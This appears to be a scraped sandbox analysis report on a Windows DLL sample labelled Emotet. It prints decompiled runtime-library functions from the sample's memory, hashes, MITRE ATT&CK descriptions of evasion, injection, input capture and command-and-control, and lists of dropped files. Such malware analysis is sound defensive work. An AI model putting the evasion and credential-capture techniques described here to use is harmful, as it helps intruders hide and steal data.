						_v44.lpszClassName = _t43;
						if(E10020B9B() == 0) {
							E10028C0C(_t40);
						}
					}
					return _t43;
				}
			}

APIs

GetClassInfoA.USER32 ref: 1002186F

Strings

Afx:%p:%x, xrefs: 10021840
Afx:%p:%x:%p:%p:%p, xrefs: 1002185B

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClassInfo
String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
API String ID: 3534257612-2801496823
Opcode ID: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
Instruction ID: 52b857fe777198d334fd01ba6041a527614e5ef36dd32a96c670ed063e64d698
Opcode Fuzzy Hash: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
Instruction Fuzzy Hash: 77214DB5D00259AFDB01DFA5D8819DEBBF8FF58290F41402AF908E7201E7309A50CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 100165C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E100165C9() {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* __esi;
				CHAR* _t10;
				signed int _t16;
				signed int _t22;
				CHAR* _t25;
				signed int _t34;
				intOrPtr _t45;

				_push(_t27);
				_t45 =  *0x10050cac; // 0x1
				if(_t45 == 0) {
					E10012D82();
				}
				 *0x1004f6fc = 0;
				GetModuleFileNameA(0, 0x1004f5f8, 0x104);
				_t10 =  *0x10050cb0; // 0x2ac3440
				 *0x1004f410 = 0x1004f5f8;
				if(_t10 == 0) {
					L4:
					_t25 = 0x1004f5f8;
				} else {
					_t25 = _t10;
					if( *_t10 == 0) {
						goto L4;
					}
				}
				E1001645D(_t25, 0,  &_v12, 0,  &_v8);
				_t40 = _v8 << 2;
				_t16 = E100107B6(_v12 + (_v8 << 2));
				_t34 = _t16;
				if(_t34 != 0) {
					E1001645D(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
					 *0x1004f3f4 = _v8 - 1;
					 *0x1004f3f8 = _t34;
					_t22 = 0;
				} else {
					_t22 = _t16 | 0xffffffff;
				}
				return _t22;
			}

APIs

___initmbctable.LIBCMT ref: 100165DB
GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rundll32.exe,00000104,00000000,?,?,?,?,?,1001125B,?,?,?,10011379,?,?), ref: 100165F3

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 100165E5, 100165EA

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FileModuleName___initmbctable
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 767393020-2837366778
Opcode ID: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
Instruction ID: 1de5955471f92093fdaebd9574c573a93ec7bfc48d4baa4f39bbab7b9738bcfe
Opcode Fuzzy Hash: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
Instruction Fuzzy Hash: 3F110AB6A04224AFD700CF99DC8599F7BE8EB4A360F21016DF915D7240EA70EE80CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10024C8E Relevance: 5.1, APIs: 4, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E10024C8E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a11, CHAR* _a12, char* _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				void* __ebp;
				intOrPtr _t39;
				int _t40;
				void* _t50;
				char* _t51;
				intOrPtr _t52;
				char* _t61;
				signed int _t62;
				CHAR* _t64;
				signed int _t73;
				void* _t74;
				CHAR* _t82;
				intOrPtr _t85;
				intOrPtr _t87;

				_t39 =  *0x1004c470; // 0x12db9c4b
				_v8 = _t39;
				_v272 = __ecx;
				if(_a12 == 0) {
					L10:
					_t40 = 0;
					__eflags = 0;
					L11:
					return E100117AE(_t40, _v8);
				}
				_t73 = _a8 << 2;
				_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t73)) - 0xc));
				if(_t85 == 0) {
					goto L10;
				}
				_t77 = _a4;
				_t82 = E100017D0(_a4, _t85 + 1);
				if(_t82 == 0) {
					E1001CE3B(_t77);
				}
				_t74 = lstrcpynA;
				lstrcpynA(_t82,  *( *((intOrPtr*)(_v272 + 8)) + _t73), _t85 + 1);
				_t50 = E10038481(_t82, 0, 0);
				_t51 = _a16;
				_t87 = _t85 - _t50 + 1;
				_v276 = _t87;
				if(_t87 != _t51) {
					L7:
					_t52 = _v272;
					__eflags =  *((intOrPtr*)(_t52 + 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t52 + 0x18)) != 0xffffffff) {
						_a12 = _t87 + _t82;
						E1002565C(_t82, 0x104, _t87 + _t82,  &_v268, 0x104);
						__eflags = 0x104;
						lstrcpynA(_a12,  &_v268, 0x104 - _v276);
						E10024AA1(__eflags, _t82,  *((intOrPtr*)(_v272 + 0x18)), _a20);
					}
					goto L9;
				} else {
					_t61 = _t51 + _t82;
					_a11 =  *((intOrPtr*)(_t87 + _t82));
					_a16 = _t61;
					 *_t61 = 0;
					_t62 = lstrcmpiA(_a12, _t82);
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					_a12 = _t64;
					 *((char*)(_t87 + _t82)) = _a11;
					if(_t64 == 0) {
						goto L7;
					}
					E1002565C(_t82, 0x104, _a16,  &_v268, 0x104);
					lstrcpynA(_t82,  &_v268, 0x104);
					L9:
					E10006CE2(_t74, _a4, _t82, 0xffffffff);
					_t40 = 1;
					goto L11;
				}
			}

APIs

lstrcpynA.KERNEL32(00000000,?,?,?), ref: 10024CF7
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10024D25
lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000104), ref: 10024D59

Part of subcall function 1002565C: GetFileTitleA.COMDLG32(?,?,00000000,00000000,00000104), ref: 1002568C

lstrcpynA.KERNEL32(00000000,?,?,?,?,00000104,00000000,00000000,00000000), ref: 10024D93

Part of subcall function 10024AA1: lstrlenA.KERNEL32(?), ref: 10024AAC
Part of subcall function 10024AA1: lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: lstrcpyn$FileTitlelstrcmpilstrcpylstrlen
String ID:
API String ID: 1551867014-0
Opcode ID: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
Instruction ID: f695b848086fad3498a552c61b02124914b138edf6a9cb0088e4b153e3f01fcd
Opcode Fuzzy Hash: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
Instruction Fuzzy Hash: 39418B76900269AFCB51CF68DC80EEA77F9EF49344F010199F99997251DB70EE81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10013EDE Relevance: 5.1, APIs: 4, Instructions: 57
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10013EDE() {
				signed int _t15;
				void* _t17;
				void* _t18;
				intOrPtr* _t20;
				void* _t24;
				signed int _t26;
				void* _t27;
				intOrPtr* _t30;

				_t15 =  *0x10050a48; // 0x0
				_t26 =  *0x10050a58; // 0x0
				if(_t15 != _t26) {
					L4:
					_t27 =  *0x10050a4c; // 0x0
					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x10050a60, 8, 0x41c4);
					 *(_t30 + 0x10) = _t17;
					if(_t17 != 0) {
						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
						 *(_t30 + 0xc) = _t18;
						if(_t18 != 0) {
							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
							 *_t30 = 0;
							 *((intOrPtr*)(_t30 + 4)) = 0;
							 *0x10050a48 =  *0x10050a48 + 1;
							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
							_t20 = _t30;
						} else {
							HeapFree( *0x10050a60, 0,  *(_t30 + 0x10));
							goto L5;
						}
					} else {
						L5:
						_t20 = 0;
					}
					return _t20;
				} else {
					_t2 = _t26 * 4; // 0x50
					_t24 = HeapReAlloc( *0x10050a60, 0,  *0x10050a4c, _t26 + _t2 + 0x50 << 2);
					if(_t24 != 0) {
						 *0x10050a58 =  *0x10050a58 + 0x10;
						 *0x10050a4c = _t24;
						_t15 =  *0x10050a48; // 0x0
						goto L4;
					} else {
						return 0;
					}
				}
			}

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,100144CF,00000000,?,00000000), ref: 10013F05
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,100144CF,00000000,?,00000000), ref: 10013F3E
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10013F5C
HeapFree.KERNEL32(00000000,?), ref: 10013F73

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
Instruction ID: aeb6b17fbef21620812925e1521d5c5e2c0640cb2d2eb2dc13b54a0eeae557ec
Opcode Fuzzy Hash: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
Instruction Fuzzy Hash: D0116D346003659FE761CF19DCC5D1A7BB1FB81760710852DF156DA5B1C3719882DB01

Uniqueness

Uniqueness Score: -1.00%

Function 10037A1B Relevance: 5.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10037A1B(signed int _a4) {
				struct _CRITICAL_SECTION* _t13;
				signed int _t21;
				intOrPtr* _t24;

				if( *0x1004f350 == 0) {
					E100379F7();
				}
				_t21 = _a4;
				_t24 = 0x1004f158 + _t21 * 4;
				if( *_t24 == 0) {
					EnterCriticalSection(0x1004f19c);
					if( *_t24 == 0) {
						InitializeCriticalSection(0x1004f1b8 + (_t21 + _t21 * 2) * 8);
						 *_t24 =  *_t24 + 1;
					}
					LeaveCriticalSection(0x1004f19c);
				}
				_t13 = 0x1004f1b8 + (_t21 + _t21 * 2) * 8;
				EnterCriticalSection(_t13);
				return _t13;
			}

0x10037a22
0x10037a24
0x10037a24
0x10037a32
0x10037a36
0x10037a40
0x10037a49
0x10037a4e
0x10037a5b
0x10037a61
0x10037a61
0x10037a64
0x10037a6a
0x10037a6e
0x10037a76
0x10037a7b

APIs

EnterCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A49
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A5B
LeaveCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A64
EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A76

Part of subcall function 100379F7: InitializeCriticalSection.KERNEL32(1004F19C,10037A29,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A0F

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterInitialize$Leave
String ID:
API String ID: 713024617-0
Opcode ID: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
Instruction ID: b71c326a3937b492ac304e5451021ab9c1c46bd2d9d00a0dd2066787caa8deb7
Opcode Fuzzy Hash: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
Instruction Fuzzy Hash: EFF0493200026EEFD711EF95CC88A66B3ACFB85322F40082AE148C2022D734B556CAA4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CUfsVUDkr6

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
CUfsVUDkr6

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre